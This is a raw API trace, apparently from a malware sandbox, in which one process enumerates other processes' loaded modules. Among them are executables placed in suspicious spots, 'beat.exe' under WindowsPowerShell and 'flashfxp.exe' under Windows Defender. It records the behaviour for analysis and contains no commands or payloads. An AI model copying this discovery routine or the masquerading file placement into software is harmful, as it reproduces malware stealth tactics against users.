GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x25d7428, cb=0x18 | out: lpmodinfo=0x25d7428*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0051.089] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0051.090] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0051.090] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9d0) returned 0x218 [0051.090] EnumProcessModules (in: hProcess=0x218, lphModule=0x25d9b38, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x25d9b38, lpcbNeeded=0x41eb20) returned 1 [0051.091] GetModuleInformation (in: hProcess=0x218, hModule=0xa40000, lpmodinfo=0x25d9da8, cb=0x18 | out: lpmodinfo=0x25d9da8*(lpBaseOfDll=0xa40000, SizeOfImage=0x17000, EntryPoint=0xa414a1)) returned 1 [0051.091] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xa40000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="beat.exe") returned 0x8 [0051.092] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xa40000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Program Files\\WindowsPowerShell\\beat.exe" (normalized: "c:\\program files\\windowspowershell\\beat.exe")) returned 0x2b [0051.092] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x25dbfb8, cb=0x18 | out: lpmodinfo=0x25dbfb8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0051.092] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0051.094] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0051.094] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x25de178, cb=0x18 | out: lpmodinfo=0x25de178*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0051.095] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0051.095] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0051.096] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x25e0338, cb=0x18 | out: lpmodinfo=0x25e0338*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0051.096] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0051.097] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0051.097] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x25e2508, cb=0x18 | out: lpmodinfo=0x25e2508*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0051.098] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0051.098] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0051.099] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb58) returned 0x218 [0051.099] EnumProcessModules (in: hProcess=0x218, lphModule=0x25e4c18, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x25e4c18, lpcbNeeded=0x41eb20) returned 1 [0051.100] GetModuleInformation (in: hProcess=0x218, hModule=0xec0000, lpmodinfo=0x25e4e88, cb=0x18 | out: lpmodinfo=0x25e4e88*(lpBaseOfDll=0xec0000, SizeOfImage=0x17000, EntryPoint=0xec14a1)) returned 1 [0051.100] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xec0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="flashfxp.exe") returned 0xc [0051.100] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xec0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Defender\\flashfxp.exe" (normalized: "c:\\program files\\windows defender\\flashfxp.exe")) returned 0x2e [0051.100] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x25e70a8, cb=0x18 | out: lpmodinfo=0x25e70a8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0051.101] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0051.101] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0051.102] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x25e9280, cb=0x18 | out: lpmodinfo=0x25e9280*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0051.102] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0051.102] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0051.103] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x25eb440, cb=0x18 | out: lpmodinfo=0x25eb440*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0051.103] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0051.104] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0051.104] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x25ed610, cb=0x18 | out: lpmodinfo=0x25ed610*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0051.105] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0051.105] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0051.106] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc1c) returned 0x218 [0051.106] EnumProcessModules (in: hProcess=0x218, lphModule=0x25efd20, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x25efd20, lpcbNeeded=0x41eb20) returned 1 [0051.110] GetModuleInformation (in: hProcess=0x218, hModule=0x13f7d0000, lpmodinfo=0x25eff90, cb=0x18 | out: lpmodinfo=0x25eff90*(lpBaseOfDll=0x13f7d0000, SizeOfImage=0x6c000, EntryPoint=0x13f80b450)) returned 1 [0051.110] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x13f7d0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wmiprvse.exe") returned 0xc [0051.111] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x13f7d0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wmiprvse.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe")) returned 0x25 [0051.111] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x25f21a0, cb=0x18 | out: lpmodinfo=0x25f21a0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0051.111] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0051.112] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0051.112] GetModuleInformation (in: hProcess=0x218, hModule=0x77710000, lpmodinfo=0x25f4360, cb=0x18 | out: lpmodinfo=0x25f4360*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0051.112] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77710000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0051.113] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77710000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0051.113] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd910000, lpmodinfo=0x25f6530, cb=0x18 | out: lpmodinfo=0x25f6530*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0051.114] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd910000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0051.114] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd910000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0051.115] GetModuleInformation (in: hProcess=0x218, hModule=0x77610000, lpmodinfo=0x25f8700, cb=0x18 | out: lpmodinfo=0x25f8700*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0051.115] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77610000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0051.116] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77610000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0051.116] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff1c0000, lpmodinfo=0x25fa918, cb=0x18 | out: lpmodinfo=0x25fa918*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0051.117] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff1c0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0051.117] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff1c0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0051.118] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff350000, lpmodinfo=0x25fcad8, cb=0x18 | out: lpmodinfo=0x25fcad8*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0051.119] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff350000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0051.119] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff350000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0051.120] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff690000, lpmodinfo=0x25fec88, cb=0x18 | out: lpmodinfo=0x25fec88*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0051.121] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff690000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0051.122] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff690000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0051.122] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff100000, lpmodinfo=0x2600e48, cb=0x18 | out: lpmodinfo=0x2600e48*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0051.123] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff100000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0051.124] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff100000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0051.125] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdf90000, lpmodinfo=0x26030a0, cb=0x18 | out: lpmodinfo=0x26030a0*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0051.126] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdf90000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0051.126] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdf90000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0051.127] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff760000, lpmodinfo=0x2605288, cb=0x18 | out: lpmodinfo=0x2605288*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0051.128] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff760000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0051.129] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff760000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0051.130] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdb50000, lpmodinfo=0x2607448, cb=0x18 | out: lpmodinfo=0x2607448*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0051.131] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdb50000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0051.132] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdb50000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0051.133] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff430000, lpmodinfo=0x2609608, cb=0x18 | out: lpmodinfo=0x2609608*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0051.134] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff430000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0051.135] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff430000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0051.136] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefee80000, lpmodinfo=0x260b7d8, cb=0x18 | out: lpmodinfo=0x260b7d8*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0051.137] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefee80000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0051.138] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefee80000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0051.139] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9bc0000, lpmodinfo=0x260d998, cb=0x18 | out: lpmodinfo=0x260d998*(lpBaseOfDll=0x7fef9bc0000, SizeOfImage=0xd3000, EntryPoint=0x7fef9c38b00)) returned 1 [0051.141] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9bc0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="FastProx.dll") returned 0xc [0051.142] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9bc0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\FastProx.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")) returned 0x25 [0051.143] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9e20000, lpmodinfo=0x260fb70, cb=0x18 | out: lpmodinfo=0x260fb70*(lpBaseOfDll=0x7fef9e20000, SizeOfImage=0x77000, EntryPoint=0x7fef9e5e7f0)) returned 1 [0051.144] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9e20000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wbemcomn2.DLL") returned 0xd [0051.145] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9e20000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbemcomn2.DLL" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")) returned 0x21 [0051.146] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd1e0000, lpmodinfo=0x2611d40, cb=0x18 | out: lpmodinfo=0x2611d40*(lpBaseOfDll=0x7fefd1e0000, SizeOfImage=0x22000, EntryPoint=0x7fefd1e5d30)) returned 1 [0051.148] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd1e0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0051.149] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd1e0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0051.150] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff970000, lpmodinfo=0x2614018, cb=0x18 | out: lpmodinfo=0x2614018*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0051.151] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff970000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0051.153] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff970000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0051.154] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9c0000, lpmodinfo=0x26161d8, cb=0x18 | out: lpmodinfo=0x26161d8*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0051.163] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9c0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0051.164] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9c0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0051.166] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9b90000, lpmodinfo=0x2618388, cb=0x18 | out: lpmodinfo=0x2618388*(lpBaseOfDll=0x7fef9b90000, SizeOfImage=0x27000, EntryPoint=0x7fef9b911a0)) returned 1 [0051.167] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9b90000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="NTDSAPI.dll") returned 0xb [0051.169] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9b90000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NTDSAPI.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")) returned 0x1f [0051.170] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef95c0000, lpmodinfo=0x261a548, cb=0x18 | out: lpmodinfo=0x261a548*(lpBaseOfDll=0x7fef95c0000, SizeOfImage=0x12000, EntryPoint=0x7fef95c89d0)) returned 1 [0051.172] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef95c0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="NCObjAPI.DLL") returned 0xc [0051.173] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef95c0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NCObjAPI.DLL" (normalized: "c:\\windows\\system32\\ncobjapi.dll")) returned 0x20 [0051.175] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff400000, lpmodinfo=0x261c718, cb=0x18 | out: lpmodinfo=0x261c718*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0051.176] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff400000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0051.178] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff400000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0051.179] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9d0000, lpmodinfo=0x261e8d8, cb=0x18 | out: lpmodinfo=0x261e8d8*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0051.181] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9d0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0051.183] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9d0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0051.184] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd670000, lpmodinfo=0x2620a98, cb=0x18 | out: lpmodinfo=0x2620a98*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0051.186] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd670000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0051.188] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd670000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0051.189] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb800000, lpmodinfo=0x2622c68, cb=0x18 | out: lpmodinfo=0x2622c68*(lpBaseOfDll=0x7fefb800000, SizeOfImage=0x2d000, EntryPoint=0x7fefb801010)) returned 1 [0051.191] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb800000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="ntmarta.dll") returned 0xb [0051.193] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb800000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")) returned 0x1f [0051.194] GetModuleInformation (in: hProcess=0x218, hModule=0x7feffae0000, lpmodinfo=0x2624e28, cb=0x18 | out: lpmodinfo=0x2624e28*(lpBaseOfDll=0x7feffae0000, SizeOfImage=0x52000, EntryPoint=0x7feffae10d4)) returned 1 [0051.196] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feffae0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="WLDAP32.dll") returned 0xb [0051.198] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feffae0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WLDAP32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")) returned 0x1f [0051.200] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff360000, lpmodinfo=0x2626fe8, cb=0x18 | out: lpmodinfo=0x2626fe8*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0051.201] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff360000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0051.204] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff360000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0051.206] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9b80000, lpmodinfo=0x26291c0, cb=0x18 | out: lpmodinfo=0x26291c0*(lpBaseOfDll=0x7fef9b80000, SizeOfImage=0xe000, EntryPoint=0x7fef9b85500)) returned 1 [0051.208] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9b80000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wbemprox.dll") returned 0xc [0051.210] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9b80000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")) returned 0x25 [0051.212] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd070000, lpmodinfo=0x262b398, cb=0x18 | out: lpmodinfo=0x262b398*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0051.214] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd070000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0051.216] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd070000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0051.218] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcd70000, lpmodinfo=0x262d558, cb=0x18 | out: lpmodinfo=0x262d558*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0051.219] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcd70000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0051.222] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcd70000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0051.224] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd760000, lpmodinfo=0x262f718, cb=0x18 | out: lpmodinfo=0x262f718*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0051.226] 